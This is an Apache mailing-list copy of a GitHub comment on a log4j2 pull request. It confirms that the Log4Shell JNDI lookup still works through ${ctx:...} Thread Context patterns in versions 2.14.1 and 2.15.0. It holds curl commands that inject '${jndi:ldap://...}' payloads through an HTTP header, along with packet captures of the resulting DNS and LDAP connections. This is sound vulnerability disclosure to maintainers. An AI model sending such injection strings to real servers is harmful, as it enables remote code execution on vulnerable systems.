You are viewing a plain text version of this content. The canonical link for it is here.
Posted to notifications@logging.apache.org by GitBox <gi...@apache.org> on 2021/12/14 12:00:17 UTC

[GitHub] [logging-log4j2] SpComb commented on pull request #608: Restrict LDAP access via JNDI

SpComb commented on pull request #608:
URL: https://github.com/apache/logging-log4j2/pull/608#issuecomment-993469509


   > Following up on my question if this fixes usage with other property substitutions like ctx: [#608 (comment)](https://github.com/apache/logging-log4j2/pull/608#issuecomment-992427010)
   > 
   > Apparently I could confirm my assumption regarding the usage of Thread Context Map, I created a PR here ([lunasec-io/lunasec#298](https://github.com/lunasec-io/lunasec/pull/298)) and made changes to the demonstration app to demonstrate the vulnerability even with `formatMsgNoLookups=true` set shown here: https://github.com/kmindi/log4shell-vulnerable-app.
   > 
   > Here is also the diff to see what I changed to demonstrate vulnerable `${ctx.apiversion}` usage in the log pattern: [kmindi/log4shell-vulnerable-app@e539f7e](https://github.com/kmindi/log4shell-vulnerable-app/commit/e539f7e9a0c81e2c580d63caff5f4eae14033f19)
   > 
   > Can someone confirm this?
   
   Yes: `curl -v 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://example.net/test}'` results in a DNS lookup with 2.14.1, whereas the attacker-controlled input in the message field does not:
   ```
    41 17.676741911   172.17.0.1 -> 172.17.0.2   HTTP 209 GET / HTTP/1.1 
    42 17.676769664   172.17.0.2 -> 172.17.0.1   TCP 66 8080 > 56934 [ACK] Seq=1 Ack=144 Win=30080 Len=0 TSval=346936700 TSecr=2382643118
    43 17.680613689   172.17.0.2 -> 10.52.0.2    DNS 79 Standard query 0xffa9  A example.net
    44 17.680814368    10.52.0.2 -> 172.17.0.2   DNS 79 Standard query response 0xffa9 No such name
    45 17.687397342   172.17.0.2 -> 172.17.0.1   HTTP 193 HTTP/1.1 200   (text/plain)
   ```
   
   The bad news: this seems to also work with 2.15.0, `X-Api-Version: ${jndi:ldap://localhost/test}` results in a TCP connection to localhost:389:
   
   ```
   $ docker exec -it log4shell-vulnerable-app jar -tvf /app/spring-boot-application.jar  | grep log4j
      828 Tue Dec 14 11:55:34 GMT 2021 BOOT-INF/classes/log4j2.properties
    24231 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-slf4j-impl-2.15.0.jar
   1789769 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-core-2.15.0.jar
    30947 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-jul-2.15.0.jar
   301804 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-api-2.15.0.jar
   ```
   
   ```
   $ curl -v "$(docker inspect -f '{{.NetworkSettings.IPAddress}}' log4shell-vulnerable-app):8080/" -H 'X-Api-Version: ${jndi:ldap://localhost/test}'
   *   Trying 172.17.0.2:8080...
   * Connected to 172.17.0.2 (172.17.0.2) port 8080 (#0)
   > GET / HTTP/1.1
   > Host: 172.17.0.2:8080
   > User-Agent: curl/7.76.1
   > Accept: */*
   > X-Api-Version: ${jndi:ldap://localhost/test}
   > 
   * Mark bundle as not supporting multiuse
   < HTTP/1.1 200 
   < Content-Type: text/plain;charset=UTF-8
   < Content-Length: 13
   < Date: Tue, 14 Dec 2021 11:57:10 GMT
   < 
   * Connection #0 to host 172.17.0.2 left intact
   Hello, world![
   ```
   
   ```
   $ sudo nsenter -t "$(docker inspect -f '{{.State.Pid}}' log4shell-vulnerable-app)" -n tshark -i lo -n
   Running as user "root" and group "root". This could be dangerous.
   Capturing on 'Loopback'
     1 0.000000000    127.0.0.1 -> 127.0.0.1    TCP 74 38380 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426441 TSecr=0 WS=128
     2 0.000013194    127.0.0.1 -> 127.0.0.1    TCP 54 389 > 38380 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
     3 0.023625945    127.0.0.1 -> 127.0.0.1    TCP 74 38382 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426464 TSecr=0 WS=128
     4 0.023636425    127.0.0.1 -> 127.0.0.1    TCP 54 389 > 38382 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
     5 0.027652034    127.0.0.1 -> 127.0.0.1    TCP 74 38384 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426468 TSecr=0 WS=128
     6 0.027662963    127.0.0.1 -> 127.0.0.1    TCP 54 389 > 38384 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
     7 0.042974136    127.0.0.1 -> 127.0.0.1    TCP 74 38386 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426484 TSecr=0 WS=128
     8 0.042985398    127.0.0.1 -> 127.0.0.1    TCP 54 389 > 38386 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
   ```
   
   This requires a pattern configured to use `${ctx:...}` lookups with attacker-controlled `ThreadContext` values, which seem to get expanded recursively.
   
   The JNDI restrictions work correctly (no DNS lookups for `example.net`, only `localhost` connections), but the https://issues.apache.org/jira/browse/LOG4J2-3198 "disable message lookups by default" does not seem to apply to `${ctx:...}` lookups.


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: notifications-unsubscribe@logging.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org